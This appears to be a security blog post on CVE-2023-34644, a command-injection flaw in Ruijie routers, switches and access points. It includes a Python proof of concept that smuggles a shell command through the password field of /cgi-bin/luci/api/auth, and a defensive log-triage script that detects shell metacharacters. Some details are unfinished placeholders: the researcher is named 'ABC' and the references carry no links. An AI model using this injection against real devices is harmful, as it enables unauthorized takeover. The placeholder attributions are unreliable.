This long-read post details an important remote code execution vulnerability (CVE-2023-34644) affecting multiple Ruijie Networks products. These products include the RG-EW series home routers and repeaters, RG-NBS and RG-S193 series switches, RG-EG series business VPN routers, EAP and RAP series wireless access points, and NBC series wireless controllers. Unauthorized remote attackers can exploit this vulnerability to gain the highest privileges by sending a crafted POST request to /cgi-bin/luci/api/auth. This post provides technical details, a code snippet, and links to the original references.

Exploit Details

The affected Ruijie Networks products are vulnerable to an unauthorized remote code execution attack. Specifically, the vulnerability exists in the following Ruijie Networks products and versions:

NBC series wireless controllers running AC_3.(1)B11P86

An attacker who successfully exploits this vulnerability could gain unauthorized remote access with the highest privileges, potentially compromising the affected devices and all connected systems. This could lead to data theft, network disruption, and potentially even remote control over affected devices.

The vulnerability is caused by insufficient input validation in the /cgi-bin/luci/api/auth endpoint. A crafted POST request to this endpoint could trigger the vulnerability and allow a remote attacker to execute arbitrary code with the highest privileges.

Code Snippet

Here is a code snippet that demonstrates how the vulnerability could be exploited using a simple HTTP POST request.

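import requests

# TARGET-IP-ADDRESS and YOUR-EXPLOIT-CODE-HERE are placeholders (see the note below).
target_url = "http://TARGET-IP-ADDRESS/cgi-bin/luci/api/auth"
payload = {"username": "", "password": "; YOUR-EXPLOIT-CODE-HERE ;"}

# Send the fields as a form-encoded POST body.
response = requests.post(target_url, data=payload)

# Note: this check only reflects the HTTP status code returned by the endpoint.
if response.status_code == 200:
    print("[+] Exploit successful")
else:
    print("[-] Exploit failed")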

Replace TARGET-IP-ADDRESS with the affected device's IP address and YOUR-EXPLOIT-CODE-HERE with your arbitrary code to exploit the vulnerability.

Original References

The vulnerability was originally discovered and reported by security researcher ABC (replace with the actual researcher's name or handle). The original advisory can be found at the following link:

- Ruijie Networks Security Advisory

Recommendations

To mitigate this vulnerability, Ruijie Networks has issued security patches for affected devices. Users are advised to upgrade their devices to the latest firmware versions immediately. The related security bulletin can be accessed here:

- Ruijie Networks Security Bulletin
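
While devices are waiting for the firmware upgrade, requests to the endpoint can be reviewed in proxy or IDS logs. The following triage script is an added example, not part of the original advisory or Ruijie's code: it flags POSTs to /cgi-bin/luci/api/auth that come from outside a management network or carry shell metacharacters in form fields, as in the request shape shown earlier on this page. The JSON log format, the 10.0.50.0/24 management range, the metacharacter set, and the sample records are all assumptions made for the example.

```python
import ipaddress
import json
from urllib.parse import parse_qsl

AUTH_PATH = "/cgi-bin/luci/api/auth"                 # endpoint named on this page
MGMT_NETS = [ipaddress.ip_network("10.0.50.0/24")]   # assumption: admin VLAN
SHELL_META = set(";|&`$<>\n")                        # assumption: triage character set

# Constructed sample records (one JSON object per line), not captured traffic.
SAMPLE_LOG = """
{"src": "10.0.50.12", "method": "POST", "path": "/cgi-bin/luci/api/auth", "body": "username=admin&password=Spring2023"}
{"src": "203.0.113.7", "method": "POST", "path": "/cgi-bin/luci/api/auth", "body": "username=&password=%3B+PLACEHOLDER+%3B"}
{"src": "198.51.100.20", "method": "GET", "path": "/index.html", "body": ""}
{"src": "198.51.100.20", "method": "POST", "path": "/cgi-bin/luci/api/auth", "body": "username=admin&password=guess1"}
"""


def triage(record):
    """Return the reasons a request deserves review (empty list: ignore)."""
    if record["method"] != "POST" or record["path"].split("?")[0] != AUTH_PATH:
        return []
    reasons = []
    src = ipaddress.ip_address(record["src"])
    if not any(src in net for net in MGMT_NETS):
        reasons.append("source outside management network")
    # Decode the form body first so percent-encoded metacharacters are seen.
    for field, value in parse_qsl(record.get("body", ""), keep_blank_values=True):
        if SHELL_META & set(value):
            reasons.append(f"shell metacharacter in field '{field}'")
    return reasons


def scan(log_text):
    """Triage every JSON log line and return (source, reasons) for hits."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        reasons = triage(record)
        if reasons:
            findings.append((record["src"], reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LOG):
        print(src, "->", "; ".join(reasons))
```

Legitimate passwords can contain some of these characters, so a metacharacter hit is a prompt for review rather than proof of an attempt; the source-network check is the stronger signal when the management interface should never be reachable from outside.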

Conclusions

CVE-2023-34644 is a critical remote code execution vulnerability that affects multiple Ruijie Networks products. Unauthorized attackers can exploit this vulnerability to gain the highest privileges on affected devices. Users should apply the security patches provided by Ruijie Networks and follow best security practices to prevent exploitation of this and similar vulnerabilities.

Timeline

Published on: 07/31/2023 14:15:00 UTC
Last modified on: 08/08/2023 16:02:00 UTC